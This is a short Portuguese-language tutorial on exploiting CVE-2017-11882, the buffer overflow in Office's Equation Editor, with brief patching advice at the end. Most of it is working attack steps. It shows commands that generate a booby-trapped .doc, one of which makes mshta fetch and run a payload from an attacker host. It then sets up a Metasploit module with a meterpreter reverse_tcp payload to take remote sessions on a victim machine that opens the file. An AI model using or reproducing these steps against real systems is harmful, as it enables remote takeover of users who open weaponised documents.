
CVE-2017-11882(通杀Office 2003到2016)
Do ponto de vista do efeito da exploração, ele pode afetar todas as versões do Office 2003 ao 2016, e todo o ambiente de ataque é muito simples de construir. Esta vulnerabilidade é causada pelo [Editor de Equações] dentro do software Office, pois o processo do editor não verifica o comprimento do nome, resultando em um estouro de buffer. Um atacante pode construir caracteres especiais para executar código arbitrário. Por exemplo, se um hacker explorar essa vulnerabilidade e construir um arquivo Office com uma backdoor de shell, quando um usuário comum abrir esse arquivo Office, o computador pode ser controlado diretamente pelo hacker.
office 2003
office 2007
office 2010
office 2013
office 2016
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

Clique no arquivo "test.doc" gerado e a calculadora do computador será exibida com sucesso.
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc


O arquivo Word 11882-3.doc foi gerado com sucesso.
Coloque o arquivo cve_2017_11882.rb no diretório /usr/share/metasploit-framework/modules/exploits/windows/smb:
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165
msf exploit(CVE-2017-11882) > set uripath 11882
msf exploit(CVE-2017-11882) > exploit
Estado de escuta ativado:

Clique no arquivo 11882-3.doc na máquina alvo Windows 7 e obtenha sessões com sucesso!

① Atualização online; ativar o Windows Update. Isso é suficiente para a maioria das pessoas.
② Aplicar patch; o endereço do patch da Microsoft correspondente a esta vulnerabilidade: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882